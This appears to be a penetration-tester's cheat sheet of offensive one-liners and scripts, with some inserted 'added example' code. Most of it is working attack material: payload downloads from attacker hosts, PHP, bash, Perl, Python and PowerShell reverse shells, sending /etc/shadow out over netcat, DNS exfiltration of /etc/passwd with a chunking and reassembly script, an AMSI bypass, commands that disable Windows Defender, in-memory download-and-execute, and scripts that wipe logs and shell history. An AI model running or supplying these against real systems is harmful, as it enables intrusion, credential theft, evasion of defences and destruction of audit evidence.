# One-Liners and Dirty Scripts

If I use it and it's not here, it's probably over here: <https://github.com/burmat/burmatscripts>

## File Transfers

### Python HTTP File Download

If you have remote command execution on a box with Python, something like this should do the trick. `urllib.URLopener` is Python 2 only (it was removed in Python 3), so check `python --version` first and use `urllib.request.urlretrieve` on 3.x:

```sh
# Python 2
python -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter');"
# Python 3
python3 -c "import urllib.request; urllib.request.urlretrieve('http://<attacker ip>/meterpreter', '/tmp/meterpreter')"
```

or if it is a Windows box, it's not much different:

```powershell
python.exe -c "import urllib; f = urllib.URLopener(); f.retrieve('http://<attacker ip>/rs_powershell.exe', '/temp/rs_powershell.exe');"
```

### BITS Download

```powershell
Start-BitsTransfer -Source $URL -Destination $Path
```

### PowerShell Download with Custom HTTP Headers

```powershell
$wc = New-Object System.Net.WebClient;
$wc.Headers.Add('User-Agent', "This is my agent, there is no one like it...");
# DownloadString returns the body as a string (wrap it in IEX to run it);
# use $wc.DownloadFile($url, $localPath) instead if you want it on disk
$wc.DownloadString("http://192.168.119.120/run.ps1");
```

### VBS HTTP File Download

I got stuck with a borked up reverse shell on a Windows system with no file transfer methods and no modern scripting options. I scraped together the following one-liner to dump into my shell to get my payload over by writing a VBS script with echo statements to issue the download:

```vb
echo Set o=CreateObject^("MSXML2.XMLHTTP"^):Set a=CreateObject^("ADODB.Stream"^):Set f=Createobject^("Scripting.FileSystemObject"^):o.open "GET", "http://<attacker ip>/meterpreter.exe", 0:o.send^(^):If o.Status=200 Then > "C:\temp\download.vbs" &echo a.Open:a.Type=1:a.Write o.ResponseBody:a.Position=0:If f.Fileexists^("C:\temp\meterpreter.exe"^) Then f.DeleteFile "C:\temp\meterpreter.exe" >> "C:\temp\download.vbs" &echo a.SaveToFile "C:\temp\meterpreter.exe" >>"C:\temp\download.vbs" &echo End if >>"C:\temp\download.vbs" &cscript //B "C:\temp\download.vbs" &del /F /Q "C:\temp\download.vbs"
```

*(originally sourced from here:* [*http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html*](http://karceh.blogspot.com/2011/06/vbs-download-file-from-internet.html)*)*

### Impacket's smbserver.py

As always, the [impacket suite](https://github.com/SecureAuthCorp/impacket) shines. Use `smbserver.py` to open an SMB server on your host for file exfiltration. Add `-smb2support`, or current Windows clients (which ship with SMBv1 disabled) will refuse to connect:

```powershell
smbserver.py -smb2support burmat_exfil ./loot -username burmat -password burmat

## from the target:
PS C:\> net use Q: \\10.1.1.123\burmat_exfil /user:burmat burmat
PS C:\> mv .\bh.zip Q:\bh.zip
PS C:\> net use Q: /delete
```

### PERL HTTP File Download

```sh
perl -e 'use File::Fetch; my $ff=File::Fetch->new(uri => "http://10.10.10.11/exploit.sh"); my $file = $ff->fetch() or die $ff->error;'
```

### Nginx + PUT Request

[Picked up from here](https://www.youtube.com/watch?v=ob9SgtFm6_g) (thanks @ippsec), you can start a nginx server that can accept PUT requests for file transfer via HTTP. `dav_methods` needs the `ngx_http_dav_module` (compiled into the Debian/Kali packages), and the `root` directory has to exist and be writable by the nginx worker user (`www-data`), otherwise every PUT comes back as a 500:

```shell
cat /etc/nginx/sites-enabled/file_upload
```

```nginx
server {
    listen 8001 default_server;
    server_name burmat.co;
    location / {
        root /var/www/upload/;
        dav_methods PUT;
    }
}
```

```shell
service nginx start
```

Issue a `PUT` request from a remote system to upload files to `/var/www/upload` on your system. Send the file as the raw request body (`-T` or `--data-binary`), not with `-F`: that would wrap it in a multipart form and the stored file would contain the boundary lines along with your data. cURL:

```sh
curl -T /home/user/l00t.txt http://192.168.1.87:8001/l00t.txt
```

PowerShell (`-InFile` streams the bytes as-is; `Get-Content` would split the file into lines and mangle anything binary):

```powershell
Invoke-RestMethod -Method PUT -Uri "http://10.10.14.12:8001/l00t.txt" -InFile l00t.txt
```
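If you would rather not touch the nginx config, the same listener fits in one Python file. The following is an added example, not code from the original page or from ippsec's video: an `http.server` handler (Python 3.7+ for `ThreadingHTTPServer`) that accepts `PUT`, writes the body under an upload directory, and echoes the SHA-256 so the sender can confirm the bytes arrived intact. It also refuses any path that resolves outside the upload directory; anyone who can reach the port could otherwise write wherever the listener's user can. The bind address `127.0.0.1`, the ephemeral port and the sample file used by `demo()` are assumptions for the stand-alone run; bind to your tun0 address for real use.

```python
# Added example (not from the original page): Python stand-in for the nginx
# dav_methods PUT listener, so curl -T / Invoke-RestMethod -InFile uploads can be
# received without editing nginx. Assumptions: bind address 127.0.0.1 and the
# temporary upload directory in demo() are placeholders.
from __future__ import annotations

import hashlib
import os
import tempfile
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.error import HTTPError
from urllib.parse import unquote, urlsplit
from urllib.request import Request, urlopen


def safe_target(upload_dir: str, request_path: str) -> str | None:
    """Map the request path to a file under upload_dir, or None if it escapes it.

    realpath() collapses '..' (including percent-encoded '%2e%2e') and symlinks,
    so a hostile or confused client cannot make the listener overwrite files
    elsewhere on the box it runs on.
    """
    name = unquote(urlsplit(request_path).path).lstrip("/")
    if not name:
        return None
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, name))
    return target if target.startswith(root + os.sep) else None


class PutHandler(BaseHTTPRequestHandler):
    upload_dir = "."  # replaced per server in make_server()

    def do_PUT(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        body = self.rfile.read(length)  # curl -T / --data-binary send the raw file bytes
        target = safe_target(self.upload_dir, self.path)
        if target is None:
            self.send_error(403, "path escapes upload dir")
            return
        os.makedirs(os.path.dirname(target), exist_ok=True)
        with open(target, "wb") as fh:
            fh.write(body)
        digest = hashlib.sha256(body).hexdigest()
        self.send_response(201)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        # Echo size and hash so the sender can confirm the transfer was not truncated.
        self.wfile.write(f"{len(body)} bytes sha256={digest}\n".encode())

    def log_message(self, fmt: str, *args) -> None:
        pass  # keep the console quiet; demo() prints what it needs


def make_server(upload_dir: str, port: int = 0) -> ThreadingHTTPServer:
    """Start a PUT listener on 127.0.0.1:port (0 = pick a free port) in a daemon thread."""
    handler = type("BoundPutHandler", (PutHandler,), {"upload_dir": upload_dir})
    srv = ThreadingHTTPServer(("127.0.0.1", port), handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def put_file(port: int, name: str, data: bytes) -> tuple[int, str]:
    """Client side, equivalent to `curl -T <file> http://127.0.0.1:<port>/<name>`."""
    req = Request(f"http://127.0.0.1:{port}/{name}", data=data, method="PUT")
    try:
        with urlopen(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except HTTPError as err:
        return err.code, str(err.reason)


def demo() -> dict:
    """Round-trip a constructed sample file, then try a percent-encoded traversal."""
    sample = b"constructed sample loot: user=burmat hash=0123456789abcdef\n"
    with tempfile.TemporaryDirectory() as upload_dir:
        srv = make_server(upload_dir)
        port = srv.server_address[1]
        status, reply = put_file(port, "l00t.txt", sample)
        with open(os.path.join(upload_dir, "l00t.txt"), "rb") as fh:
            stored = fh.read()
        # "%2e%2e/%2e%2e/etc/passwd" decodes to ../../etc/passwd on the server side
        evil_status, _ = put_file(port, "%2e%2e/%2e%2e/etc/passwd", b"nope")
        srv.shutdown()
        srv.server_close()
    return {
        "status": status,
        "stored_ok": stored == sample,
        "hash_ok": hashlib.sha256(sample).hexdigest() in reply,
        "traversal_status": evil_status,
    }


if __name__ == "__main__":
    print(demo())
```

Point the clients above at it unchanged (`curl -T l00t.txt http://<attacker ip>:<port>/l00t.txt`); the 201 reply carries the byte count and hash, and a traversal attempt gets a 403 instead of a file somewhere under `/`.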

### Netcat File Transfer

Because if Netcat is on the system, everything becomes easier:

```sh
listener: nc -l -p 4444 > output.file
sender:   nc -w 3 [destination] 4444 < input.file
```

(and if it's not - go get it: `tftp -i <attacker ip> get nc.exe`; `-i` is the Windows client's binary-transfer switch, and you need a TFTP server such as `atftpd` serving `nc.exe` on your side)

### Certutil.exe Transfer

Using `certutil.exe` is a clever way to get files down to a victim if you are attacking a Windows box and limited on methods. Be aware that `-urlcache -split -f` also leaves a copy of the download in the user's URL cache (`certutil -urlcache` lists the entries), and that current Defender signatures flag this exact download pattern:

```powershell
certutil.exe -urlcache -split -f http://10.10.15.11/burmat.exe C:\temp\burmat.exe
```

You can also write a file from Base64 encoded text, too (`-decode` accepts plain Base64 as well as the `-----BEGIN CERTIFICATE-----` style output of `certutil -encode`). The `regsvr32 /u` line loads the DLL and calls its `DllUnregisterServer` export, so the payload has to implement that export:

```powershell
certutil.exe -decode C:\temp\payload.txt C:\temp\payload.dll
regsvr32 /s /u C:\temp\payload.dll
```

(*Source:* [*http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html*](http://carnal0wnage.attackresearch.com/2017/08/certutil-for-delivery-of-files.html) )

### HTTP GET Request via Bash

Bash only: `/dev/tcp` is a bash feature that `sh`/`dash` do not have. Bash opens the TCP connection itself, sends a minimal HTTP/1.0 request, discards the response headers up to the first blank line, and writes the body to `$LFILE`. Serve the file with `python3 -m http.server $RPORT` on the attacker box:

```sh
export RHOST=burmat.co
export RPORT=12345
export LFILE=file_to_get
bash -c '{ echo -ne "GET /$LFILE HTTP/1.0\r\nhost: $RHOST\r\n\r\n" 1>&3; cat 0<&3; } \
    3<>/dev/tcp/$RHOST/$RPORT \
    | { while read -r; do [ "$REPLY" = "$(echo -ne "\r")" ] && break; done; cat; } > $LFILE'
```

### RAW TCP Connection

Fetch remote file using a TCP connection. Run `nc -l -p 12345 < "file_to_send"` on the attacker box to send the file.

```sh
export RHOST=burmat.co
export RPORT=12345
export LFILE=file_to_get
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
```

### SQLMAP - User w/ FILE Privileges

If you have SQLi with a user account that has `FILE` privileges, you can use `sqlmap` to transfer the file to disk without formulating an `INTO OUTFILE` query yourself. Two things have to line up on the server besides the privilege: the MySQL service account must be able to write to the destination directory, and `secure_file_priv` must allow it (empty means anywhere; a directory name confines writes to that directory; `NULL` disables file writes altogether, check it with `--sql-query "SELECT @@secure_file_priv"`):

```bash
sqlmap -r inject.req --dbms "mysql" --file-write shell.php --file-dest \\inetpub\\wwwroot\\shell.php
```

To see if you have the privilege, run `sqlmap -r inj.req --privileges` (it enumerates each user's privileges, `FILE` included), or attempt (you might not have rights) to dump the `user` table directly:

```bash
root@kali:~ ❯ sqlmap -r inj.req --dbms "mysql" -D mysql -T user -C User,File_Priv --dump
.. SNIP ..
[2 entries]
+---------+-----------+
| User    | File_Priv |
+---------+-----------+
| burmat  | Y         |
| root    | Y         |
+---------+-----------+
```

### XML File Creation on Target (via copy/paste)

This is a clever way to get XML over to the system using copy and paste: paste the document into a here-string cast to `[XML]` (the cast fails on the spot if the paste mangled the markup), then write it to file with `.Save()`:

```powershell
$console = [XML] @"
<XML CODE CODE HERE>
"@

# write the xml to file:
$console.save("C:\users\burmat\documents\console.xml")
```

### Base64

#### Using Netcat

```bash
# receiving host
nc -lp 4443 | base64 -d > loot.txt

# sender host (bash only: /dev/tcp is a bash feature)
base64 /etc/shadow > /dev/tcp/10.10.10.123/4443
```

#### Copy and Paste

```bash
## encode from file with (-w0 turns off line wrapping; BSD/macOS base64 has no -w, pipe through tr -d '\n' there):
base64 -w0 shell.py

## decode to file with:
echo -n "ZmlsZSBjb250ZW50IGhlcmUK" | base64 -d > shell.py

## compare a checksum on both ends, terminals like to drop or wrap characters:
md5sum shell.py
```

## Shells / Reverse Shells

Collection of reverse shell payloads for various languages and platforms.

### PHP Reverse Shell - Minified

```php
<?php set_time_limit (0); $VERSION = "1.0"; $ip = "10.10.10.10"; $port = 8080; $chunk_size = 1400; $write_a = null; $error_a = null; $shell = "uname -a; w; id; /bin/bash -i"; $daemon = 0; $debug = 0; if (function_exists("pcntl_fork")) { $pid = pcntl_fork(); if ($pid == -1) { exit(1); } if ($pid) { exit(0); } if (posix_setsid() == -1) { exit(1); } $daemon = 1; } chdir("/"); umask(0); $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { exit(1); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while (1) { if (feof($sock)) { break; } if (feof($pipes[1])) { break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { $input = fread($sock, $chunk_size); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { $input = fread($pipes[1], $chunk_size); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { $input = fread($pipes[2], $chunk_size); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); ?>
```

*(originally sourced from:* [*https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php*](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php)*)*

### Python Reverse Shell for Windows

```python
import socket, subprocess, threading

# Read commands from the socket and feed them to cmd.exe's stdin. The flush()
# matters on Python 3, where Popen pipes are block-buffered by default and
# cmd.exe would otherwise never see the command.
def s2p(s, p):
    while True:
        data = s.recv(1024)
        if not data:          # listener went away
            p.kill()
            break
        p.stdin.write(data)
        p.stdin.flush()

# Relay cmd.exe output back over the socket one byte at a time, so the prompt
# arrives without waiting for a newline.
def p2s(s, p):
    while True:
        out = p.stdout.read(1)
        if not out:           # cmd.exe exited
            break
        s.send(out)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.11.0.37", 4444))

p = subprocess.Popen(["\\windows\\system32\\cmd.exe"], stdout=subprocess.PIPE,
                     stderr=subprocess.STDOUT, stdin=subprocess.PIPE)

s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()

p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()

try:
    p.wait()
except KeyboardInterrupt:
    s.close()
```

### WinRM Ruby Shell

```ruby
require 'winrm'
conn = WinRM::Connection.new( 
  endpoint: 'https://IP:PORT/wsman',
  transport: :ssl,
  user: 'username',
  password: 'password',
  :no_ssl_peer_verification => true
)
command=""
conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        print "PS > "
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end
```

*(originally sourced from:* [*https://github.com/WinRb/WinRM*](https://github.com/WinRb/WinRM)*)*

### Bash Reverse Shell (One-Liner)

```bash
0<&196;exec 196<>/dev/tcp/10.10.10.10/4444; sh <&196 >&196 2>&196
```

### Perl Reverse Shell

```perl
perl -e 'use Socket;$i="10.10.10.10";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

### PowerShell One-Liner Reverse Shell

```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

## Enumeration

Various scripts and one-liners for system enumeration and reconnaissance.

### Finding Vulnerable Applications (Linux)

This one is pretty dirty, and pretty awesome. Run a one-liner on your victim to generate a list of packages (`rpm` **or** `dpkg`) on the machine (`/tmp/packages.txt`). Copy this file to one that has `searchsploit`, and run the script. Generate the file with (the `dpkg` branch matches only lines starting with `ii`, i.e. installed packages, instead of any line containing "ii"):

```sh
FILE="packages.txt"; FILEPATH="/tmp/$FILE"; if rpm -q -f /usr/bin/rpm >/dev/null 2>&1; then rpm -qa --qf "%{NAME} %{VERSION}\n" | sort -u > $FILEPATH; else dpkg -l | awk '/^ii/ {print $2 " " $3}' > $FILEPATH; fi; echo "kernel $(uname -r)" >> $FILEPATH; echo ""; echo "[>] Done. Transfer $FILEPATH to your computer and run: "; echo ""; echo "./packages_compare.sh /path/to/$FILE"; echo "";
```

*(thanks to* [*chryzsh*](https://github.com/chryzsh) *for doing the heavy lifting)*

### "Proc Mon" (IppSec) Script

One of the handiest scripts to find running jobs and processes in real time. It polls `ps` once a second and prints only the lines that changed, so anything that lives for less than the polling interval can slip between samples. Thanks to [IppSec](https://twitter.com/ippsec) for sharing it with the world:

```sh
#!/bin/bash

IFS=$'\n'
old_process=$(ps -eo command)

while true; do
  new_process=$(ps -eo command)
  # '<' lines vanished since the last sample, '>' lines are new
  diff <(echo "$old_process") <(echo "$new_process") | grep '[<>]'
  sleep 1
  old_process=$new_process
done
```

### SNMP Walker

```bash
#!/bin/bash
# targets.txt: one IP per line; lines not starting with a digit are skipped
for ip in $(awk '/^[0-9]/ {print $1}' ~/Documents/labs/targets.txt); do

	# the redirects below fail silently if the output directory is missing
	mkdir -p ~/Documents/labs/$ip/scans

	echo "Performing snmpwalk on public tree for" $ip " - Checking for System Processes"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.1.6.0 > ~/Documents/labs/$ip/scans/systemprocesses.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for Running Programs"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2 > ~/Documents/labs/$ip/scans/runningprograms.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for Processes Path"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.4 > ~/Documents/labs/$ip/scans/processespath.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for Storage Units"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.2.3.1.4 > ~/Documents/labs/$ip/scans/storageunits.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for Software Name"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2 > ~/Documents/labs/$ip/scans/softwarename.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for User Accounts"
	snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25 > ~/Documents/labs/$ip/scans/useraccounts.txt

	echo "Performing snmpwalk on public tree for" $ip " - Checking for TCP Local Ports"
	snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3 > ~/Documents/labs/$ip/scans/tcplocalports.txt

	echo "Performing snmp-check scan for" $ip
	snmp-check $ip > ~/Documents/labs/$ip/scans/snmpcheck.txt

	echo "Cleaning up empty files..."
	find ~/Documents/labs/$ip/scans/ -size 0 -print0 | xargs -0 rm -f
done
```

### Ping Scan

#### Linux Ping Scanning:

You can use a regular-old for loop:

```bash
for i in {1..254}; do ping -c 1 -W 1 172.1.1.$i | grep 'from'; done
```

Or you can try out the following Python script:

```python
#!/usr/bin/env python3
import multiprocessing, subprocess, os

def pinger(job_q, results_q):
    DEVNULL = open(os.devnull, 'w')
    while True:
        ip = job_q.get()
        if ip is None:
            break
        try:
            # -c1: one probe; -W1: give up after a second so dead hosts do not stall the worker
            subprocess.check_call(['ping', '-c1', '-W1', ip], stdout=DEVNULL, stderr=DEVNULL)
            results_q.put(ip)
        except subprocess.CalledProcessError:
            pass  # no reply: host is down or filtering ICMP

if __name__ == '__main__':
    pool_size = 255
    jobs = multiprocessing.Queue()
    results = multiprocessing.Queue()
    pool = [multiprocessing.Process(target=pinger, args=(jobs, results)) for i in range(pool_size)]
    for p in pool:
        p.start()

    for i in range(1, 255):
        jobs.put('10.120.15.{0}'.format(i))

    # one sentinel per worker so every process exits its loop
    for p in pool:
        jobs.put(None)

    for p in pool:
        p.join()

    while not results.empty():
        ip = results.get()
        print(ip)
```

#### Windows Ping Scan:

Not the fastest or the cleanest, but it's an easy way to generate a ping scan from a `cmd` prompt. Match on `TTL=` rather than `Reply`, because "Destination host unreachable" answers from your own gateway also start with "Reply from" and would show up as live hosts. Inside a `.bat` file, double the percent signs (`%%i`):

```cmd
FOR /L %i IN (1,1,254) DO ping -n 1 -w 200 192.168.1.%i | FIND /i "TTL=" >> ips.txt
```

## Remote Desktop (Enable/Add)

### Enable RDP

```powershell
Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

If you need to add your user to the group, you can use: `NET LOCALGROUP "Remote Desktop Users" domain\user /ADD`. And if you need to disable the firewall altogether: `NetSh Advfirewall set allprofiles state off`. All of this needs an elevated shell, and `UserAuthentication` set to `1` leaves Network Level Authentication required, so connect with a client that supports NLA.

## Defense Evasion

### AMSI Bypass (PowerShell)

Disable AMSI in the current PowerShell session (no admin rights needed). This exact string has been signatured for years, so on a current Defender it is itself caught by AMSI and the line never runs; expect to have to obfuscate it:

```powershell
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```

### Disable Windows Defender

Needs an elevated shell. On hosts with Tamper Protection enabled these cmdlets return without error but the settings are silently left unchanged, so confirm with `Get-MpComputerStatus` afterwards:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableBehaviorMonitoring $true
```

### Download and Execute in Memory

Avoid writing to disk entirely. The script body still goes through AMSI when `IEX` compiles it, and where script block logging is enabled it is recorded in full under Event ID 4104:

```powershell
IEX (New-Object Net.WebClient).DownloadString('http://burmat.co/payload.ps1')
```

### Clear Windows Event Logs

Clears every log the host knows about. This needs admin rights and is itself loud: clearing the Security log writes Event ID 1102 and clearing any other log writes Event ID 104 into the freshly emptied log, which is exactly what SIEM rules watch for.

```powershell
wevtutil el | Foreach-Object {wevtutil cl "$_"}
```

### LOLBin - Download with mshta

```cmd
mshta vbscript:Close(Execute("GetObject(""script:http://burmat.co/payload.sct"")"))
```

### LOLBin - Bypass AppLocker with InstallUtil

`InstallUtil.exe` is a Microsoft-signed .NET binary, so it runs where unsigned executables are blocked. `/U` calls the `Uninstall` method of any `System.Configuration.Install.Installer` class in the assembly, which is where the payload code goes; the file therefore has to be a .NET assembly, not an arbitrary EXE.

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U payload.exe
```

## Data Exfiltration

### DNS Exfiltration

Exfiltrate data through DNS queries (useful when HTTP/HTTPS is blocked). The queries go to whatever resolver the host uses, so you have to be authoritative for the zone (`burmat.co` here) and read the data out of your nameserver's query log. Keep each label at or under 63 characters and stick to a hostname-safe alphabet: hex is fine, but base64's `+`, `/` and `=` are not legal label characters, so use base32 instead (its `=` padding only appears at the very end and can be dropped; the receiver re-pads by length):

```bash
# Hex encode and exfil via DNS
cat /etc/passwd | xxd -p | fold -w32 | while read line; do dig $line.burmat.co; done

# Base32 encode and exfil (base64 would put '+', '/' and '=' into the labels)
cat sensitive.txt | base32 -w0 | tr -d '=' | fold -w32 | while read line; do nslookup $line.burmat.co; done
```
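The one-liners above fire the queries off and hope they arrive in order. Below is an added example, not code from the original page, that shows both ends of the channel: the sender-side chunker and the receiver-side reassembler, with the constraints a resolver enforces made explicit (63-byte labels, 253-byte names, a hostname-safe hex alphabet, case-insensitive matching because resolvers may randomise the case of a name, and a sequence number per query so reordering, retries and gaps are handled). The zone `exfil.example` is a placeholder for a domain you control and the passwd-style sample is constructed; nothing is actually sent, the receiver is simply handed the list of names a DNS query log would contain.

```python
# Added example (not from the original page): the xxd|fold|dig one-liner
# generalised into a sender-side chunker and a receiver-side reassembler.
# Hex is used because every hex digit is a legal hostname character, unlike
# base64's '+', '/' and '='. Assumptions: the zone exfil.example is a
# placeholder for an attacker-controlled domain; the sample data is constructed.
from __future__ import annotations

import binascii
import random

MAX_LABEL = 63          # RFC 1035: one label is at most 63 octets
MAX_NAME = 253          # RFC 1035: a full name is at most 253 characters in text form
ZONE = "exfil.example"  # placeholder, assumed attacker-controlled
HEX = set("0123456789abcdef")


def encode_queries(data: bytes, zone: str = ZONE, label_len: int = 60,
                   labels_per_query: int = 3) -> list[str]:
    """Split data into query names of the form '<seq>.<hex>[.<hex>...].<zone>'.

    seq is a decimal chunk counter so the receiver can reorder and spot gaps;
    each hex label carries label_len // 2 raw bytes.
    """
    if not 1 <= label_len <= MAX_LABEL:
        raise ValueError("label_len must be 1..63")
    hexdata = binascii.hexlify(data).decode()
    step = label_len * labels_per_query
    names = []
    for seq, off in enumerate(range(0, len(hexdata), step)):
        chunk = hexdata[off:off + step]
        labels = [chunk[i:i + label_len] for i in range(0, len(chunk), label_len)]
        name = ".".join([str(seq), *labels, zone])
        if len(name) > MAX_NAME:
            raise ValueError(f"query name too long ({len(name)}); lower labels_per_query")
        names.append(name)
    return names


def decode_queries(names: list[str], zone: str = ZONE) -> tuple[bytes, list[int]]:
    """Receiver side: rebuild the data from the query names seen at the nameserver.

    Accepts any order and duplicates (resolvers retry), ignores names outside
    the zone or with non-hex payload, and lower-cases everything because
    resolvers may randomise the case of a name (0x20 encoding). Returns
    (data, missing_seqs); data is the in-order concatenation of what arrived.
    """
    suffix = "." + zone.lower()
    chunks: dict[int, str] = {}
    for name in names:
        name = name.rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        seq_s, _, hexpart = name[: -len(suffix)].partition(".")
        hexpart = hexpart.replace(".", "")
        if not seq_s.isdigit() or not hexpart or not set(hexpart) <= HEX:
            continue
        chunks[int(seq_s)] = hexpart
    missing = [i for i in range(max(chunks) + 1) if i not in chunks] if chunks else []
    hexdata = "".join(chunks[i] for i in sorted(chunks))
    return binascii.unhexlify(hexdata), missing


def demo() -> dict:
    """Round-trip a constructed passwd-style sample through a shuffled, noisy capture."""
    sample = (b"root:x:0:0:root:/root:/bin/bash\n"
              b"burmat:x:1000:1000::/home/burmat:/bin/bash\n")
    queries = encode_queries(sample, label_len=16, labels_per_query=2)
    # what a query log might hold: our names, unrelated traffic, and a retried upper-cased copy
    capture = queries + ["www.example.com", queries[0].upper() + "."]
    random.shuffle(capture)
    data, missing = decode_queries(capture)
    _, missing_with_gap = decode_queries(queries[:2] + queries[3:])  # chunk 2 never arrived
    return {"n_queries": len(queries), "round_trip_ok": data == sample,
            "missing": missing, "missing_with_gap": missing_with_gap}


if __name__ == "__main__":
    for q in encode_queries(b"hi", label_len=16):
        print(q)  # 0.6869.exfil.example
    print(demo())
```

On the sender, each name from `encode_queries()` is what you hand to `dig` or `nslookup`; on the receiver, feed `decode_queries()` the QNAMEs from your authoritative server's query log and act on any non-empty `missing` list by re-requesting those chunks.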

## System Cleanup

### Purge Linux Logs

Written for an old sysvinit/sysklogd layout. On a systemd host the syslog daemon is `rsyslog` (`systemctl stop rsyslog`), and journald keeps its own binary logs under `/var/log/journal` that this script never touches (`journalctl --rotate && journalctl --vacuum-time=1s` clears those).

```bash
#!/bin/sh

/etc/init.d/sysklogd stop
VARLOGS="auth.log boot btmp daemon.log debug dmesg kern.log mail.info mail.log mail.warn messages syslog udev wtmp"
cd /var/log
for ii in $VARLOGS; do
  echo -n > $ii
  rm -f $ii.? $ii.?.gz
done

/etc/init.d/samba stop
rm -f /var/log/samba/*

rm -f /var/lib/dhcp3/*

for ii in /var/log/proftpd/* /var/log/postgresql/* /var/log/apache2/*; do
  echo -n > $ii
done
```

### Covering Tracks

Two caveats: the script runs in its own process, so the `history -c` on the last line only clears that process's (empty) history, not your interactive shell's; and bash rewrites `~/.bash_history` from memory when the interactive shell exits, repopulating the file you just emptied. Run `unset HISTFILE; history -c` in the interactive shell itself (or `source` the script) to actually cover the session.

```bash
#!/bin/bash
echo "COVERING TRACKS"
echo  "clearing /var/log/auth.log"
echo "" > /var/log/auth.log
echo "clearing ~/.bash_history"
echo "" > ~/.bash_history
echo "clearing /root/.bash_history"
echo "" > /root/.bash_history
echo "removing ~/.bash_history"
rm ~/.bash_history -rf
echo "removing /tmp/"
rm -R /tmp/*
echo "clearing /var/log/messages"
echo "" > /var/log/messages
echo "clearing command history"
history -c
```
